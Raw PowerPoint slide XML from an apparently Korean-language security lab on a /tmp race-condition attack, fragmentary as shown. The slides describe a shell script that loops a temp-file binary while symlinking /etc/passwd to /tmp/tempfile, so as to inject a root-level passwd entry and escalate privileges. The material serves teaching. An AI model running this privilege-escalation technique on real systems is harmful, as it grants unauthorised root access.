                <a:gridCol w="5390959">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="372272330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55433575"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="303657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활성화하면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주소가 실행할 때마다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 변경 없이도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공격의 방어가 일부 가능하다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공격을 성공시킬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2156445"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69633" name="_x617883232">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39EC40B8-29EC-4CEF-8198-5077B2CA2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691" y="1769617"/>
            <a:ext cx="4656138" cy="2120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437817-B378-4F35-A9EA-71E314E5D783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4427156"/>
            <a:ext cx="5616792" cy="2061843"/>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155500072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이용하여 권한 상승을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시도하시오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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>통해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다음을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삽입하시오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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360278754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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l 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/sec/createTempFile.</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vim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/sec/createTempFile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>./createTempFile Test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile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err="1"/>
              <a:t>명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 인자로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 추가됨을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/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 작성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vim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143">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5976D8-17E7-43BF-8A40-C0278FA229E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500380" y="1100666"/>
            <a:ext cx="5135880" cy="541020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4EE6A3-1744-4DB6-B5B7-AB94CC2FEBAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500380" y="2144606"/>
            <a:ext cx="5400040" cy="2990596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DDACDB-0DED-4220-B383-66DCD44E56F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2109268076"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500380" y="5200516"/>
          <a:ext cx="4968748" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4968748">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="8226148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72331991"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char=""/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">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작성된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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(remove),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생성</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(fopen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내용 추가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수행한다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8415954"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5E00B4-9767-417D-9C4B-7708EA208C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314440" y="1100666"/>
            <a:ext cx="4594860" cy="807720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5479E1B6-BC9D-4A77-B2E9-E7F8136EB1CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261100" y="2800520"/>
            <a:ext cx="4877816" cy="2956814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14917602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a:t>.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 권한 부여</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 755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a:t>.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 권한 상승을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>통한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 조작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B0495DD-15AA-42C8-99DA-D6EE22C9BA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3575144664"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="482536" y="501301"/>
          <a:ext cx="4932807" cy="2443226"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="304647659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492215407"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1860296">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/sec/createTempFile insertid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>::0:0:root/root:/bin/bash &amp;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s /etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/passwd /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>tmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/tempfile </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>&amp;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done</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echo </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>"STOP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>... The passwd file has ben changed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000"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6073262"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="표 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{607BED53-6299-4A40-B0C5-1A7D3EC54E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3594578354"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="482536" y="3082831"/>
          <a:ext cx="5280914" cy="3105372"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5280914">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="342704905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29400559"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1637506">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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작성한 쉘 스크립트는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바이너리를 실행하여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문자열이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저장되도록 하면서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링크가 되도록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성공할 때까지 위를 반복한다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0673885"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">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CF5E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="997999769"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139E61FA-04B8-4C98-B644-4375D7665294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276340" y="894926"/>
            <a:ext cx="5013960" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DB0B6D-C6B2-4A41-9210-653C8E5A0BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276340" y="2144754"/>
            <a:ext cx="4381500" cy="2788920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215332303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993C7773-1E01-4A87-A5D3-84602AC344BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29366634"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492315" y="531781"/>
          <a:ext cx="5004689" cy="1955546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5004689">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="284761806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15364398"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="14538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sh</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old=`ls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while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"$old" ==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do</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6116800"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24783ED4-2DC3-467F-ACA5-CF48357CCA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1058589260"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286917" y="531781"/>
          <a:ext cx="5412768" cy="580050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358140" marR="0" indent="-3581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스크립트에 의해 실행된 프로세스들</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(createTempFile,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병렬적으로 실행되는 것이 아니라 컨텍스트 스위칭</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(context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switching)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통해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번갈아가며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다음 그림과 같은 형태로 실행될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pic>
        <p:nvPicPr>
          <p:cNvPr id="77828" name="_x618145072">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94716C9-27FA-45D6-8605-777D15AEE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623" y="1745774"/>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표 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDA30C07-719D-408A-92F7-58BAD7D1A866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1181481313"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492315" y="2788531"/>
          <a:ext cx="5412768" cy="3629183"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5412768">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="811078406"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="20710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341117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① 파일 삭제 이전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② 파일 삭제 및 파일 생성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4135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mn-ea"/>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존재하지 않으므로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 소프트 링크의 소유자는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75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바이너리는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
